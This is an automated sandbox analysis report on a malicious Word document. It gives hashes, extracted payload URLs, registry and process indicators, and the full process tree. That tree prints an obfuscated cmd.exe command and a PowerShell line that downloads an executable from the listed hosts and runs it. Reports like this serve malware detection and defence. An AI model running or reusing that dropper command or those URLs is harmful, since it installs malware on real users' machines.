Analysis
-
max time kernel
119s -
max time network
120s -
platform
windows7_x64 -
resource
win7-20240508-en -
resource tags
arch:x64arch:x86image:win7-20240508-enlocale:en-usos:windows7-x64system -
submitted
19-05-2024 18:19
Behavioral task
behavioral1
Sample
5ac1e88265ded3e67477cce519906e50_JaffaCakes118.doc
Resource
win7-20240508-en
Behavioral task
behavioral2
Sample
5ac1e88265ded3e67477cce519906e50_JaffaCakes118.doc
Resource
win10v2004-20240508-en
General
-
Target
5ac1e88265ded3e67477cce519906e50_JaffaCakes118.doc
-
Size
126KB
-
MD5
5ac1e88265ded3e67477cce519906e50
-
SHA1
725f2a559f053ca645caa64f83e267f101474576
-
SHA256
8e8423332fc3be61a54a2d4f2faaa5d0fac4de05af71a5fabbac0adac89d3456
-
SHA512
72010c07a9ef5ea23e2d3e088c3c420c233ff5aa3d7c9b4bb6c7f453d8edda6c7a6787e461e57c441c2ad27170d12ca6343228d6c47597c24991bfbe56c6c99d
-
SSDEEP
1536:8ptJlmrJpmxlRw99NBu+aFKUI4BxanVldfalV0UQwGZJCVwbGOrXWy:cte2dw99f1IkbLiNXy
Malware Config
Extracted
http://www.knamanpower.com/U
http://www.flanaganlaw.com/wkM
http://lakecomoholidayapartments.com/uxbCg173
http://farkop27.ru/uEEhY0
http://juegosaleo.com/iu8xL5T1
Signatures
-
Process spawned unexpected child process 1 IoCs
This typically indicates the parent process was compromised via an exploit or macro.
Processes:
cmd.exedescription pid pid_target process target process Parent C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE is not expected to spawn this process 1896 1868 cmd.exe WINWORD.EXE -
Blocklisted process makes network request 2 IoCs
Processes:
powershell.exeflow pid process 4 2040 powershell.exe 7 2040 powershell.exe -
An obfuscated cmd.exe command-line is typically used to evade detection. 1 IoCs
Processes:
cmd.exepid process 1896 cmd.exe -
Drops file in Windows directory 1 IoCs
Processes:
WINWORD.EXEdescription ioc process File opened for modification C:\Windows\Debug\WIA\wiatrace.log WINWORD.EXE -
Office loads VBA resources, possible macro or embedded object present
-
Processes:
WINWORD.EXEdescription ioc process Set value (int) \REGISTRY\USER\S-1-5-21-2737914667-933161113-3798636211-1000\Software\Microsoft\Internet Explorer\MenuExt\E&xport to Microsoft Excel\Contexts = "1" WINWORD.EXE Set value (str) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default HTML Editor\shell\edit\ = "&Edit" WINWORD.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default HTML Editor\shell\edit\command WINWORD.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default MHTML Editor\shell WINWORD.EXE Set value (data) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default MHTML Editor\shell\edit\command\command = 7800620027004200560035002100210021002100210021002100210021004d004b004b0053006b0057004f0052004400460069006c00650073003e00620069002400540021005600210030005a003d007b0050006b00300076006d007e0041005a00750020002f006e002000220025003100220000000000 WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-2737914667-933161113-3798636211-1000\Software\Microsoft\Internet Explorer\Toolbar WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-2737914667-933161113-3798636211-1000\Software\Microsoft\Internet Explorer\MenuExt\Se&nd to OneNote\ = "res://C:\\PROGRA~2\\MICROS~1\\Office14\\ONBttnIE.dll/105" WINWORD.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default HTML Editor WINWORD.EXE Set value (str) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default MHTML Editor\shell\edit\command\ = "\"C:\\Program Files (x86)\\Microsoft Office\\Office14\\WINWORD.EXE\" /n \"%1\"" WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-2737914667-933161113-3798636211-1000\Software\Microsoft\Internet Explorer\Toolbar\ShowDiscussionButton = "Yes" WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-2737914667-933161113-3798636211-1000\Software\Microsoft\Internet Explorer\MenuExt\E&xport to Microsoft Excel WINWORD.EXE Key deleted \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default MHTML Editor\shell WINWORD.EXE Set value (int) \REGISTRY\USER\S-1-5-21-2737914667-933161113-3798636211-1000\Software\Microsoft\Internet Explorer\MenuExt\Se&nd to OneNote\Contexts = "55" WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-2737914667-933161113-3798636211-1000\Software\Microsoft\Internet Explorer\MenuExt\E&xport to Microsoft Excel\ = "res://C:\\PROGRA~2\\MICROS~1\\Office14\\EXCEL.EXE/3000" WINWORD.EXE Key deleted \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default HTML Editor\shell\edit\COMMAND WINWORD.EXE Key deleted \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default HTML Editor\shell\edit WINWORD.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default HTML Editor\shell WINWORD.EXE Set value (str) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default HTML Editor\shell\edit\command\ = "\"C:\\Program Files (x86)\\Microsoft Office\\Office14\\WINWORD.EXE\" /n \"%1\"" WINWORD.EXE Key deleted \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default MHTML Editor\shell\edit WINWORD.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default MHTML Editor\shell\edit WINWORD.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default MHTML Editor\shell\edit\command WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-2737914667-933161113-3798636211-1000\Software\Microsoft\Internet Explorer\MenuExt\Se&nd to OneNote WINWORD.EXE Key deleted \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default MHTML Editor\shell\edit\COMMAND WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-2737914667-933161113-3798636211-1000\Software\Microsoft\Internet Explorer\MenuExt WINWORD.EXE Key deleted \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default HTML Editor\shell WINWORD.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default HTML Editor\shell\edit WINWORD.EXE Set value (data) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default HTML Editor\shell\edit\command\command = 7800620027004200560035002100210021002100210021002100210021004d004b004b0053006b0057004f0052004400460069006c00650073003e00620069002400540021005600210030005a003d007b0050006b00300076006d007e0041005a00750020002f006e002000220025003100220000000000 WINWORD.EXE Key deleted \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default MHTML Editor WINWORD.EXE Set value (str) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default MHTML Editor\shell\edit\ = "&Edit" WINWORD.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default MHTML Editor WINWORD.EXE Key deleted \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default HTML Editor WINWORD.EXE -
Modifies registry class 64 IoCs
Processes:
WINWORD.EXEdescription ioc process Key created \REGISTRY\MACHINE\SOFTWARE\Classes\htmlfile\shell\Edit WINWORD.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Excel.exe\shell\edit\command WINWORD.EXE Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\MSPub.exe\shell\edit\command\ = "\"C:\\Program Files (x86)\\Microsoft Office\\Office14\\MSPUB.EXE\" %1" WINWORD.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Excel.exe WINWORD.EXE Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Microsoft Excel\shell\edit\command\ = "\"C:\\Program Files (x86)\\Microsoft Office\\Office14\\EXCEL.EXE\" /dde" WINWORD.EXE Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Microsoft Excel\shell\edit\ddeexec\ = "[open(\"%1\")]" WINWORD.EXE Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Excel.exe\shell\edit\ = "&Open" WINWORD.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Classes\htmlfile\shell\Print\command WINWORD.EXE Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\mhtmlfile\shell\Print\command\ = "\"C:\\Program Files (x86)\\Microsoft Office\\Office14\\msohtmed.exe\" /p %1" WINWORD.EXE Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Microsoft Word\shell\edit\command\ = "\"C:\\Program Files (x86)\\Microsoft Office\\Office14\\WINWORD.EXE\" /n \"%1\"" WINWORD.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Microsoft Excel\shell\edit\ddeexec\topic WINWORD.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Microsoft Publisher\shell\edit WINWORD.EXE Key deleted \REGISTRY\MACHINE\SOFTWARE\Classes\htmlfile\shell\Edit WINWORD.EXE Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\htmlfile\DefaultIcon\ = "\"%1\"" WINWORD.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{42042206-2D85-11D3-8CFF-005004838597}\Old Icon WINWORD.EXE Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Microsoft Excel\shell\edit\ddeexec\application\ = "Excel" WINWORD.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Microsoft Publisher\shell\edit\command WINWORD.EXE Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Microsoft Word\shell\edit\command\ = "\"C:\\Program Files (x86)\\Microsoft Office\\Office14\\WINWORD.EXE\" /n \"%1\"" WINWORD.EXE Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Excel.exe\shell\edit\ddeexec\ = "[open(\"%1\")]" WINWORD.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Classes\mhtmlfile\shell\Edit WINWORD.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Excel.exe WINWORD.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Excel.exe\shell\edit\ddeexec\topic WINWORD.EXE Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\htmlfile\shell\Print\ = "&Print" WINWORD.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Excel.exe\shell\edit\ddeexec\application WINWORD.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Microsoft Word\shell\edit\command WINWORD.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Microsoft Publisher WINWORD.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Classes\mhtmlfile\DefaultIcon WINWORD.EXE Set value (data) \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Microsoft Word\shell\edit\command\command = 7800620027004200560035002100210021002100210021002100210021004d004b004b0053006b0057004f0052004400460069006c00650073003e00620069002400540021005600210030005a003d007b0050006b00300076006d007e0041005a00750020002f006e002000220025003100220000000000 WINWORD.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Microsoft Excel WINWORD.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Classes\htmlfile\DefaultIcon WINWORD.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Classes\htmlfile\ShellEx WINWORD.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Microsoft Word WINWORD.EXE Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Excel.exe\shell\edit\command\ = "\"C:\\Program Files (x86)\\Microsoft Office\\Office14\\EXCEL.EXE\" /dde" WINWORD.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\MSPub.exe WINWORD.EXE Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\htmlfile\shell\Edit\command\ = "\"C:\\Program Files (x86)\\Microsoft Office\\Office14\\msohtmed.exe\" %1" WINWORD.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Classes\mhtmlfile\shell\Edit\command WINWORD.EXE Key deleted \REGISTRY\MACHINE\SOFTWARE\Classes\mhtmlfile\shell\Edit WINWORD.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Classes\mhtmlfile\shellex\IconHandler WINWORD.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\WinWord.exe WINWORD.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Classes\mhtmlfile\shell\Print WINWORD.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList WINWORD.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{42042206-2D85-11D3-8CFF-005004838597}\Version\14 WINWORD.EXE Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Microsoft Excel\shell\edit\ddeexec\topic\ = "system" WINWORD.EXE Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Excel.exe\shell\edit\ddeexec\application\ = "Excel" WINWORD.EXE Set value (data) \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Microsoft Publisher\shell\edit\command\command = 7800620027004200560035002100210021002100210021002100210021004d004b004b0053006b005000750062005000720069006d006100720079003e00520024006e0075006a0053005700460065003f007d0061004c00720052007000390078004000570020002500310000000000 WINWORD.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Classes\htmlfile\shellex\IconHandler WINWORD.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.mht WINWORD.EXE Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Microsoft Publisher\shell\edit\ = "&Open" WINWORD.EXE Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Microsoft Publisher\shell\edit\command\ = "\"C:\\Program Files (x86)\\Microsoft Office\\Office14\\MSPUB.EXE\" %1" WINWORD.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Microsoft Word\shell\edit WINWORD.EXE Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Microsoft Publisher\shell\edit\command\ = "\"C:\\Program Files (x86)\\Microsoft Office\\Office14\\MSPUB.EXE\" %1" WINWORD.EXE Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\mhtmlfile\shell\Edit\command\ = "\"C:\\Program Files (x86)\\Microsoft Office\\Office14\\msohtmed.exe\" %1" WINWORD.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Excel.exe\shell\edit\ddeexec\topic WINWORD.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\MSPub.exe\shell\edit\command WINWORD.EXE Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\WinWord.exe\shell\edit\ = "&Open" WINWORD.EXE Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\WinWord.exe\shell\edit\command\ = "\"C:\\Program Files (x86)\\Microsoft Office\\Office14\\WINWORD.EXE\" /n \"%1\"" WINWORD.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Excel.exe\shell\edit\ddeexec WINWORD.EXE Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\MSPub.exe\shell\edit\ = "&Open" WINWORD.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Classes\htmlfile\shell WINWORD.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList WINWORD.EXE Set value (data) \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\WinWord.exe\shell\edit\command\command = 7800620027004200560035002100210021002100210021002100210021004d004b004b0053006b0057004f0052004400460069006c00650073003e00620069002400540021005600210030005a003d007b0050006b00300076006d007e0041005a00750020002f006e002000220025003100220000000000 WINWORD.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Excel.exe\shell\edit WINWORD.EXE Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Microsoft Excel\shell\edit\ddeexec\application\ = "Excel" WINWORD.EXE Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Excel.exe\shell\edit\ddeexec\application\ = "Excel" WINWORD.EXE -
Suspicious behavior: AddClipboardFormatListener 1 IoCs
Processes:
WINWORD.EXEpid process 1868 WINWORD.EXE -
Suspicious behavior: EnumeratesProcesses 1 IoCs
Processes:
powershell.exepid process 2040 powershell.exe -
Suspicious use of AdjustPrivilegeToken 1 IoCs
Processes:
powershell.exedescription pid process Token: SeDebugPrivilege 2040 powershell.exe -
Suspicious use of SetWindowsHookEx 2 IoCs
Processes:
WINWORD.EXEpid process 1868 WINWORD.EXE 1868 WINWORD.EXE -
Suspicious use of WriteProcessMemory 12 IoCs
Processes:
WINWORD.EXEcmd.exedescription pid process target process PID 1868 wrote to memory of 3020 1868 WINWORD.EXE splwow64.exe PID 1868 wrote to memory of 3020 1868 WINWORD.EXE splwow64.exe PID 1868 wrote to memory of 3020 1868 WINWORD.EXE splwow64.exe PID 1868 wrote to memory of 3020 1868 WINWORD.EXE splwow64.exe PID 1868 wrote to memory of 1896 1868 WINWORD.EXE cmd.exe PID 1868 wrote to memory of 1896 1868 WINWORD.EXE cmd.exe PID 1868 wrote to memory of 1896 1868 WINWORD.EXE cmd.exe PID 1868 wrote to memory of 1896 1868 WINWORD.EXE cmd.exe PID 1896 wrote to memory of 2040 1896 cmd.exe powershell.exe PID 1896 wrote to memory of 2040 1896 cmd.exe powershell.exe PID 1896 wrote to memory of 2040 1896 cmd.exe powershell.exe PID 1896 wrote to memory of 2040 1896 cmd.exe powershell.exe
Processes
-
C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE"C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\5ac1e88265ded3e67477cce519906e50_JaffaCakes118.doc"1⤵
- Drops file in Windows directory
- Modifies Internet Explorer settings
- Modifies registry class
- Suspicious behavior: AddClipboardFormatListener
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:1868 -
C:\Windows\splwow64.exeC:\Windows\splwow64.exe 122882⤵PID:3020
-
C:\Windows\SysWOW64\cmd.execmd /V/C"^s^e^t ^w^7=^8^7^_^ ^q*^j^ ^'4^7^ C^ ^z^ ^b^Z^S^ ^m^?^e^ n^{( Jv^|^ ^p^S^E^ ^<^+{^ (^'^W^ ^z^0^ ^ ^:^M^3^ ^J^L^U^ ^J^d^[^ ^T^.^Z^ ^,Z^m^ ^xN^\^}^{^o^6^}^Z^`V^{^t^1^u^h^A^8^7cP^;^9^t%R^F^aC^7^mcs^=^4^}/^d^*^;^.^wU^k^a^'^{^a^@'^`^eP^8^Kr^;X^D^b/^$^Z^;^i^kc^DC^B^]V^6^T^-z^8^j^h^$N^d)^ ^Y^:^Om^.^f^:^e^:^JC^t*^]^d^I^Q^d^p^-^x^B/^ep^&^F^k^*^8^\^o^:^w^Zv^mv^-n^s(^*^Imr^;^;1^T^')^mN^ ^D^L^MCV^`^]^#^z_^B^f^$]^x^z^ (^2^~^,^'^g^u^t^eC^:^Zz^AkN^T^k^W^$a^_^;(^$^p=^e^|/^&^l^|m^G^i^[^|^z^F^9^S^_^d^G^;^,^a^m^J^'^o^|e^5^l^]^5^_n^t^X^`^w^yR%^o^=^DR^D^;^D^j^.^E^h^9^I^]^<^'d^b^[^zw^W^i^~^$H^q^b^{^<^T^]^y^>^U^Er^:^q^e^tV)^s^{^E^|^i)^0^mA^z^k^;^&^zy^&^8^M^_^ER^$^Z^HR^ ^Z^dRn(w^I^i(^>^e^ ^;^1)^t^3^B^o^Z^bc(N^x^G^k^$^&^Q%(^M^b/^h/^;(c^x^[^1a^U^-[^e^7^a^Yr^B^uz^o^[^Y^9f^:^@^[^;^L^Z^|^'n^.^$^e^6;Kx^AR^u^e^t^A^G^.^-^@^1^'^5^Y^a^+c^m^[Z^Zr^Y^tV^#^:^b^m^2^w^$^7^I(^+C^W^;^'^f^ ^g^\^;^13^'(^H^h^+^\^:^Ac^@^{^o^iB^`5^l^fq^:^bV^0^T^uc^y^Up^H_^x^:^Z^p^$v^b^2^&n^p^I^?e^L^`^t^$^-^w^]^=^jD^Q^D^{^f^GV%^9^E^z^@^J)^$^AN^T^;%^x`^'/^&^~0^7n^?^1W^Q^]1^Y^g^G^'^t^=^J^ ^E^$^-^=^d^X^U^ ^U^<^m^Z^K^Gxt^Y^T^`b^y^L^_^$^3^O^G^;^y^IC)^p^6^F^'^,T^A^@x^EN^'^p^[^G(^xg^s^t^`^o^>^i^u(^M^lu^wy^p^o^G^;^S^;^sG^.^,5^E^'vu^l^1^-v^3^T^eC^+5^Q^yn^L^2^mAx^w^~^<^8^XN^}^u^[^<r^i^W^_v/^B^]^h^m^-(^'^o^Z^d%c^En^5^.^4CR^o^y^H^l^e^U^e^a^l^b~^x^a^>^a^Q^sv^P^<^o^JV^<^g^k^&^eer^8^k^u^W^g^h^j^bT^@/^<^{^:/^K^S(^:^.v^'^pN^F^p^tl^E^yt^ ^J^s^h^Ic^'^@^lI^-^0(^Q^3^Y@lm^h^$^4^L^E^9^p^7^Ey%^S^u^*Em/^y^T^i^u(^+/r^d^g^h^.^\^_^'^7^3^G^4^2^7^J^m^p^$^p^d^o^X^Y^z^k^M^.^lr^'^B^a^a^_R^X^f^?^|^m/)^D^;/^]^m^0^:^S^i^q^p^q)^0^t^0^u^|^t^O^4^H^h^.Br^@^2^u^F^3^6^9^=^7^{^ ^J^1^Z^:^I^g^|^@^IC^O^S^6^b^k^G-^x^l^W^u^u^W^1^ /^0^Q^9^m^G^#^J^o^i^&/c^H^*^f^.^d^}^Hs^>F^G^t^_^enn^X(^e^e^}^J^?^m(^O^u^t^A/nr^~h^j^a^w^,^*p{V^B^a^2^A^E^y^B^z^X^a^FC^4^d^>^K^=^iS^+^#^lcC^?^o%^l^G^h^:^Z%^o^p^`v^m^@^-^e^o^o^,acL^}^s^e^q0v^k^-^>^<^a^Q)^T^l)^:N/^3^a^O/V/g^:^g^i^\^p^U^I^O^t^\^:V^t^@z^'^h^Dn^7^@^H^Y(^M^y^I^Y^k^{v^U^w^p^b^i/^K^l^km^_s^L^o^U^d^@c^i^M^s.^-^K^J^w^o^F^W^a^W^:^8^l^g^O^0n^w^l^s^a^8^k^ ^g^ZC^u^a^}/^bnc^s^A^a(^W^A^l^J^g^z^f^&^>^;^.^~^,^G^w^h^8^L^w7^p^I^w^e^Y^b/,^Y^m/^y^Q^7^:)^&^>^p^U(^a^t^L^|^$^t^]^t^l^h^P^:^;^@^u^B^'^U^z^W^o/^2^L^w^m^,^q^\o^+P*c^&N^I^.^Y^#rr^0^|)^e^\^4^l^w$^~^e^or^_^|^p^d^,^ln=^E^Ka%E^Bm^z^q^*^a^<^;^>nJv^,^k^\R^d^.^a^d^q^w^Tc^W^w^=^a^?^w^`^0^./^|^t^j/^l^t^-^:^?~^W^p^8^\V^t^*^;{^tn^t^,^hrj^J^'^]^D^U^=^Q^8^.^z^:O^Q^z^s^B^S^M^ev`^$^hSC^;^65+^t^yn^dn^7T^6^e^si^G^i^U^Q)^l^T^,^7C^9^J^7^b^~N^t^eZ^\^}^WR^Dv.^0^G(^t^uv^8^e^`^D^&N^*^]6^ ^Hl^'^t^X^e^8c^iC^g^e^@^B^K^j^ ^}R^bc^-^d^o\^$^&^-^'^>^2^w^h^g^I^eV^-^tn^A^>^e^=r^H^U^I^sn^7^d^[^l^~w^A^MF^$^$8^: ^B^9^}^l^`^q^1^l^;^&)^e^4^}^E^h^,^*^ ^sN^sVr^Z^]^~^e^WT^k^w^6R^0^o^Z^Fz^p&&^f^or /^L %C ^in (^1^4^9^1^,^-^4^,^3)^d^o ^s^e^t ^D^b^4=!^D^b^4!!^w^7:~%C,1!&&^i^f %C ^l^e^q ^3 c^a^l^l %^D^b^4:^*^D^b^4^!^=%"##2⤵
- Process spawned unexpected child process
- An obfuscated cmd.exe command-line is typically used to evade detection.
- Suspicious use of WriteProcessMemory
PID:1896 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell $wdI=new-object Net.WebClient;$Mzz='http://www.knamanpower.com/U@http://www.flanaganlaw.com/wkM@http://lakecomoholidayapartments.com/uxbCg173@http://farkop27.ru/uEEhY0@http://juegosaleo.com/iu8xL5T1'.Split('@');$btZ = '110';$zVD=$env:public+'\'+$btZ+'.exe';foreach($NZt in $Mzz){try{$wdI.DownloadFile($NZt, $zVD);Invoke-Item $zVD;break;}catch{}} ##3⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2040
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
20KB
MD54a1f0780af0683cca074813bbbb5a603
SHA131746c6651d897148ac881437232a2fe55ea1f0f
SHA25653e9e5740a301a58dfa1b1e5a1a7c0608c0ad7b02725f6f77ff5305065cb41b6
SHA512ab8fc7e6f1ca34782222cc2adacf0d2e01db07c11388cda19c4891bb5bca70da470385513bcc35ff0c59cdb93b126601a8005e16da7bb0c9ba499bf2274b3354